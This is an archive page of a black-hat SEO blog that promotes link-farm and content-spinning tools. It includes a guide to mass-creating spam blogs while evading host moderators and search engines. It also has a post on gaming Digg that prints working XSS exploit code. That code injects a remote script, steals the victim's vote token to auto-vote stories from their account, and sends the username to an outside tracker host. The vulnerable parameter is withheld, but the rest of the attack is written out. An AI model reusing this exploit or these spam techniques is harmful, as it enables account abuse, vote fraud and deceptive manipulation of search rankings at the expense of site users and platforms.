Archive for the 'Uncategorized' Category

Migrating Servers

Published on 9 months, 2 weeks ago in Uncategorized. 2 Comments

Howdy everybody!

We are going to migrate http://getyacg.com and http://blackhatseo-blog.com today, so you should expect them to be offline for some hours.

We are going to pimp out everything, so you should expect faster and better forums and tickets system.

If you are a [YACG] Mass Installer or Link Farm Evolution customer, you can send us all your support inquiries to support@blackhatseo-blog.com while the ticket system is offline.

EDIT: Everything is back to normal now! We apologize for such a long downtime, all the open issues and e-mails will be answered shortly. Thank you for your patience.

DIM: Drive, Incentivate and Monetize!

Published on 11 months ago in Uncategorized. 8 Comments Tags: , .

Howdy!

We are going to start talking about an interesting strategy we’ve been using for quite a bit that we call DIM.

DIM is pretty simple to understand, but a bit complex on the execution. Here is a quick diagram to explain how it works:

DIM

In the following days we are going to cover every single step of this technique, and for those without background experience we are also going to show what tools you need to execute this.

This will be a case study too, so you will be able to see live examples of it – Some of them with a big, steady monthly income.

Link Farm Evolution: Best Practices I

Published on 11 months, 1 week ago in Uncategorized, link farm evolution and link-building. 21 Comments

This post is dedicated to our Link Farm Evolution customers. Special thanks to discodog and guerilla for providing us with cool tips!

You guys fucking rock. We fucking rock. Link Farm Evolution rocks.

Without further delay, we present you: Link Farm Evolution: Best Practices.

1. Create batches of  200 blogs at the same time

When you create blogs on Wordpress MU hosts keep in mind that some of them will fail due to errors on the hosts, not on LFE. Based in our tests and users tests we have found that when you create blogs on WPMU hosts, you will experience a success rate of 50% – 60%.

Bottom line, aim for more to reach your goal.

2. Tag your blogs properly

Tagging your blogs the right way is a key factor to the success of your linking strategy. Having your realstate organized has many benefits, one of them is doing interlinking the right way.

Let’s do a little exercise:

  1. Create 200 blogs with the tag “halloween 1″
  2. Create 200 blogs with the tag “halloween 2″
  3. Create 200 blogs with the tag “halloween 3″
  4. Export all the blogs under the tag “halloween 1″ in .csv format.
  5. Go to your LFE and select all your blogs with the tag “halloween 3″ and click “Put links on my blog xx”.
  6. Paste all the exported blogs (The ones with the tag “halloween 1″) to add them into the blogroll of the blogs tagged with “halloween 3″ via the “Put my link on Blogroll” option.

Using this strategy your blogs tagged with “halloween 3″ will randomly link from their blogroll to the blogs tagged with “halloween 1″. You can use the same strategy to link blogs tagged “halloween 2″, but remember not to interlink too much.

3. Don’t interlink your whole network

If you have a big network of blogs (>10k), never ever interlink them all. We can’t stress this enough, so we will repeat it one more time: Never interlink your whole network!

A better approach would be if had small niched networks of blogs (around 100-300 blogs) and then you interlink them with other similar niched netwoks. (Remember the past exercise?)

In this case, if you get bitch-slapped by SERP’s you only lose a small amount of blogs instead of your whole network.

4. Set your cron job to run every 10 minutes.

Each time the cron job is triggered, it checks batches of 50 activation emails. That means that if you create 200 blogs, the script will will need to run 4 times to check all the activation emails. Less time between each run may risk you losing a couple of blogs because of delayed emails, more time will waste a lot of time.

Remember that you can also run your cron job manually by accessing http://yourdomain.com/pathtolfe/cron.php

5. Create your own catchall domains

Link Farm Evolution has access to many catchall domains for activation emails by default, but it’s more likely that your realstate won’t stick since you are using the same domains as everybody else. This point is even more important when targeting hosts like Wordpress.com, Blogger and Tumblr.

We will be adding more catchall domains every once in a while but we strongly encourage you guys to install your own. You will stay under the radar this way.

Of course as you all know, we offer the script and all the necessary support to create your own catchall domains.

6. Get free domains for your catchall domains

Don’t waste your dollars on .com or .net domains for your catchall domains. Go ahead and claim your free .co.cc domains.

You can get them at http://www.co.cc. They limit it to two free domains per account, but if you create more accounts you get more free domains (We know that you guys thought of that before reading this, so don’t give us that look!)

7. Allow a few days before publishing the first post

We have heard from a bunch of users that they leave their created blogs alone for a few days before posting something. This is because many times the webmaster of the host receives an automatic notification whenever a new blog is created and they might check it to see if it’s spammy. However, it’s is highly unlikely that they will check it down the road.

8. Start with a “clean” post and wait a few days.

Google is always crawling new sites and may recognize obvious spammy content. For your first post we suggest you to add something not spammy, like an introductory post and a couple of pics from Flickr.

Yes, we know it’s not interesting… But lets be honest, it will be more interesting than all your dirty spam :P

9. Contextual Links: Smart link on your posts

Make contextual links. You can use the integrated content spinning tools to create relevant links on your posts.

To do that, change the editor mode to “HTML CODE” and use:

<a href=”{ http://someblog.tumblr.com | http://someblog.blogger.com | http://someblog.wpmuhost.com }”> {anchor text 1 | anchor text 2 | anchor text3}</ a>

Export the links into .csv from LFE beforehand to choose the links you want to create.

10. For the love of God and everything that is pure in this world, spin your content

You can use the content spinning on several levels, for example:

{Today it is fine to Paris | In Paris today it is nice | It’s a beautiful day in Paris}

And you can also do recursive spinning like:

Today : {Today | This Morning | The afternoon | Tonight | This lunchtime}
Paris: {Rome | Paris | Prague | New York | Tokyo | Las Vegas}
Fine: {Fine | ugly | Cold | Hot | right}

And if we add the spinned words to the spinned sentences:

{{Today | This Morning | The afternoon | Tonight | This lunchtime} it is {Fine | ugly | Cold | Hot | right} to {Rome | Paris | Prague | New York | Tokyo | Las Vegas} | In {Rome | Paris | Prague | New York | Tokyo | Las Vegas} {Today | This Morning | The afternoon | Tonight | This lunchtime} it is {Fine | ugly | Cold | Hot | right| nice} | It’s a {Fine | ugly | Cold | Hot | right|beautiful} day in {Rome | Paris | Prague | New York | Tokyo | Las Vegas}}

Your posts will have a similarity of about 10%-15%

11. Create links to your blogs

To have a killer blog network, you need to drop some juice to your realstate.

50 links from some juicy domains spread around your blogs will do the job. You can use our integrated Pligg tool to post your blogs to thousands of Pligg sites, or you can use the old-not recommended-boring but still popular spammy techniques like guest books, referrer spam etc.

You could also use commercial tools like Bookmarking Demon and Onlywire to submit your blogs to social bookmarking sites.

12. Link to other sites

In order to stay under the radar, you must look legit. Have you ever seen a site without a single link to another site? No. So don’t be cheap and send some linkjiuce to related sites such as Wikipedia articles or other niched sites.

Send us your tips to support [at] blackhatseo-blog [dot] com if you want them to get featured on the sequel of this saga.

How We Gamed Digg for Fun and Profit!

Published on 11 months, 3 weeks ago in Uncategorized. 9 Comments Tags: , .

Disclaimer: This post was written to raise awareness about the importance of protecting your sites against this kind of attacks. Even though all the technical stuff (including the XSS!) is real, the actual story of what we supposedly did is not — We just wanted to spice things up a bit. Keep in mind that Digg is one of the most visited sites in the world and they must have a whole team of experts dedicated to protect themselves to this kind of stuff, don’t they? :)

Almost a year and a half ago we learned about an undisclosed XSS hole in Digg.com thanks to Beni. He is an outstanding security researcher and author of pretty sick stuff like this Digg, Delicious, Netscape and Technorati XSS Worm.

The actual XSS hole is this:

Removed after a long talk with my crew because there is the *possibility* that the XSS vector could be used as an SQL Injection too.

For those who aren’t tech savvy enough, we are going to try to explain everything so you can get a grasp about the importance of this kind of holes.

XSS is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other user. This type of vulnerabilities are useful to overcome the same origin policy that is implemented in all modern browsers. In a nutshell, this policy permits scripts running on pages originating from the same site to access the content with no specific restrictions — but prevents access to the content across pages on different sites.

For example, if we access http://asd.com and a script is executed, that script will be able to access f http://asd.com/*.html. However, it won’t be able to read anything located at http://jkl.com or even at http://subdomain.asd.com.

Now let’s examine Digg’s architecture, starting with their voting button:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

<form action="/digremote" id="f1" name="f1" method="post" target="_top">
<input type="hidden" name="digcheck" value="00000000000000000000000000000000" />
<input type="hidden" name="id" value="10797160" />
...
<li class="digg-it" id="diglink1"><a href="#" onclick="document.getElementById('f1').submit(); return false" target="_top">digg it</a></li>
...
</form>
...
<script type="text/javascript">var s_account = "diggcomsyndication";</script>
<script src="http://media.digg.com/js/loader/261/omnidiggthis" type="text/javascript"></script>
<script type="text/javascript"><!--
s.pageName = 'diggthis:digg';
s.prop9 = 'diggthis:default';
s.prop24 = 'diggthis::comedy';
s.prop29 = 'news';
s.prop4 = '00000000000000000000000000000000';
s.prop21 = 'diggthis';
s.prop22 = 'diggthis:';
s.prop23 = 'diggthis::comedy';
s.hier1 = 'diggthis,,comedy';
s.prop14 = 'diggthis:default';
s.prop8 = 'logged-in';
s.channel = 'digg.com';
var s_code=s.t();
if (s_code) document.write(s_code);
//--></script>
...

The code above will generate a button similar to this one:

Digg button @ http://cracked.com

In order to prevent a CSRF attack to autovote stories, Digg implemented the digcheck value. If you are a mean webmaster and you want to autovote your story from your visitors accounts without their knowledge, you would need to obtain the digcheck value and the Digg cookie of each visitor. There are various ways of obtaining those two bits of information, but in this case we are going to use the XSS vulnerability.

The best way of learning is doing-it-yourself, so open up the Firebug console while browsing Digg (make sure you are logged in) and execute the following script:

1
2
3
4

c = document.cookie;
l = 'loginn';
u = c.substr(c.indexOf(l)+10,c.indexOf(';',c.indexOf(l))-c.indexOf(l)-10);
alert(u);

You will see your username in an alert box since you are running the script inside Digg.com. You can achieve the same effect using the XSS, or you could use it to do something more interesting like autovoting.

Our “setup” for autovoting can be explained with this diagram:

Diagram

The exploit is pretty straight forward, and it consists of two files. The first file sends a POST request to the vulnerable page to inject a script:

1
2
3
4
5
6
7
8
9
10
11

<form action="post.php" method="post">
<div><input type="submit" /></div>
</form>
<script type="text/javascript">
<!--
with (document.forms[0]) {
	action="http://digg.com/vulnerablepage?vulnerablevariable=<script src=http%3A%2F%2Fhost.tdl%2Fautovote.js>";
	submit();
}
-->
</script>

The second file is the actual script that autovotes the post in the “money” site:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

var url = 'http://digg.com/comedy/7_Items_You_Won_t_Believe_Are_Actually_Legal';
new Ajax.Request(url,
	{
		method:'post',
		onSuccess:function(t) {
			t = t.responseText;
			a = 'javascript:dig(';
			if (t.indexOf(a) > 0) {
				i = t.indexOf('s.prop18 = \'')+12;
				i = t.substr(i,t.indexOf('\'',i)-i);
				a = t.substr(t.indexOf(',',t.indexOf(',',t.indexOf(a)+a.length)+1)+2,32);
				p = 'id='+i+'&row=5&digcheck='+a+'&type=s&loc=other';	
				new Ajax.Request('http://digg.com/diginfull', { 
					method:'post',
					parameters:p, 
					onSuccess:function(t) {
						new Ajax.Request(url, {
							method:'post',
							onSuccess:function(t) {
								if (t.responseText.indexOf('dugg') > 0) {
									c = document.cookie;
									l = 'loginn';
									u = c.substr(c.indexOf(l)+10,c.indexOf(';',c.indexOf(l))-c.indexOf(l)-10);
									var s = 'http://host.tdl/tracker.php?user='+u;
									document.body.innerHTML+='<img src="'+s+'" />';
								}
							}	
						});
					}
				});
			}
		}
	});

Of course we couldn’t leave it like this, so we took things down a step further and we implemented a lot of more goodies. One of them was this neat css history hack thingy, to check if the visitor actually came from Digg. Another thing we implemented, the cherry on the pie, is this:

Twitter Robot

We had a mother fucker robot that informed us anytime someone Digged one of our stories. Yes, a freakin’ XSS exploit communicating with us via tweets.

We rule so bad.

Content is NOT important

Published on 1 year ago in Uncategorized. 8 Comments Tags: , .

Content is NOT important. Content is NOT important. Content is NOT important. Content is NOT important. Content is NOT important. Content is NOT important. Content is NOT important. Content is NOT important. Content is NOT important. Content is NOT important. Content is NOT important. Content is NOT important. Content is NOT important. Content is NOT important. (…)

I could make an entire post like that with nothing but rubbish content and it wouldn’t matter. Why? Because content doesn’t matter, backlinks do.

Ok, that might sound a bit exaggerate… And I must admit, whenever I work on a site I spend more time working with the content than anything else (Even in my blackhat ventures like [YACG], it’s pretty evident that I make a big deal out of content).

In fact, you know what? Scratch everything I just said. Content IS important, but it all depends on what you are trying to achieve.  I make a big deal out of it because of the usability of the website. Because Good content = Returning visitors, and we all know that.

But in the particular case of rankings, backlinks are much more important than content. Let’s take as an example the keyword “click here”:

Google results for "click here"

Bing results for "click here"

Interesting. Now let’s take a look at “worst band in the world”:

Google results for worst band in the world*I firebug’ed out the first results for the sake of the length of this post

It’s evident that there’s not a single mention of “click here” or “worst band in the world” in those sites, but still they are ranking #1 for those keywords. Why? Simple, there’s a bunch of backlinks with that anchor text pointing to those sites.

(Bullshit alert!)

I’ve done some extensive testing over the past couple of years using neural networks, statistical analysis, midgets and large quantities of vodka… And I think I figured out how Google’s algorithm work. I’m planning on releasing a paper later on, but here’s the basic formula:

Google's algorithm

Where K is Google’s magic constant (100), 0.1 is the position you want (0.1 for #1, 0.2 for #2, 1.1 for #11 etc…), x1 is the number of words in the page you want to rank (without counting the keyword you want to rank for), x2 is the number of times the keyword appears on the page and f(x1,x2) is an approximation to the number of backlinks with the keyword as anchor that you need.

You don’t believe me? Let’s try it out with http://get.adobe.com/reader/ for “click here” on #1 position. I used for this experiment this word count tool and Yahoo! Site Explorer.

Google's Algorithm (2)Google's Algorith (3)According to Yahoo! Site Explorer, http://get.adobe.com/reader/ has 652,799 backlinks.

Yes, this is the moment when you go all HOLY-MOTHER-OF-GOD at your computer screen and nearby peers.

(Bullshit alert is over!)

Bottom line: Looking for rankings? Focus on backlinks.

[YACG] 3.9 has just been released. Grab it while is hot!

Published on 1 year ago in Uncategorized. 0 Comments Tags: .

The best damn content generator in the world has just been updated. Get the details at http://getyacg.com/yacg-3-9.

Double the goodness, half the file size. Still open source and free!

Get higher positions in SERPs and wicked-fast indexing by search engines with thousands of free one-way links

Published on 1 year, 1 month ago in Uncategorized. 6 Comments Tags: , , , .

Link Farm Evolution is the tool that allows you to harness the power of social media platforms such as Wordpress Multi-User, Pligg and Blogger to build a vast link farm. Open-source and wide-spread, those platforms allow you to get quality links on thousands of unique domains in unlimited quantities. And the best part is that you don’t have to pay a thing or do any manual labor to do that. – We even take care of captchas for you :)

Check out this general overview of what is Link Farm Evolution:

It’s Time to Make Investments That Pay off — Get Link Farm Evolution Right Now at http://linkfarmevolution.com

Abandoned project turned into a monster

Published on 1 year, 7 months ago in Uncategorized. 7 Comments Tags: , .

Holy shit, do you remember my black hat command center? It was an attempt to manage my whole inventory of domains, sites, accounts and integrate all the scripts that I was using at that time (Social bookmarking, sitemap submitter, trackback spammer, social bookmarking etc…) Unfortunately, I got involved in a lot of other projects and I never really had the time to develop my pet project to it’s full potential.

It’s been abandoned for over a year now, but for some reason I never took it offline. Yesterday was one of those days that I don’t know why I decided to login again and found this.

Network Operation Center

It’s been scraping keyw0rds and sending trackbacks like crazy (Talk about reliability!)…

  • This system had a cron that scraped the daily search trends, and then scraped and generated longtails for each daily trend (+250,000 longtails)
  • Then, after doing a bunch of other internal processes it scraped blogs related to each longtail and did a couple of tests to see if you could send a trackback to the blog. (+2,500,000 blogs sorted by longtail that accept trackbacks from my script)
  • +80,000 fresh and tested proxies
  • +20,000 ips from search engines

Too bad I turned off the content generation to keep the load down on my server, because I would have a database with unique human readable content for +250,000 longtails.

I wonder what would have happened if I had left a couple of sites running on auto mode on the system with all turned on.

Try Google AdWords with $250 in free advertising

Published on 1 year, 7 months ago in Uncategorized. 4 Comments Tags: .

There’s not much to say about this promotion other than it expires on January 31, 2009. To claim your coupon, please go to:

http://www.google.com/ads/250/v.html

Back from Europe

Published on 1 year, 7 months ago in Uncategorized. 0 Comments

I know things have been a bit slow lately, but that was because I was taking some well deserved vacations.

This week I’ll start catching up with all the emails, posts and comments.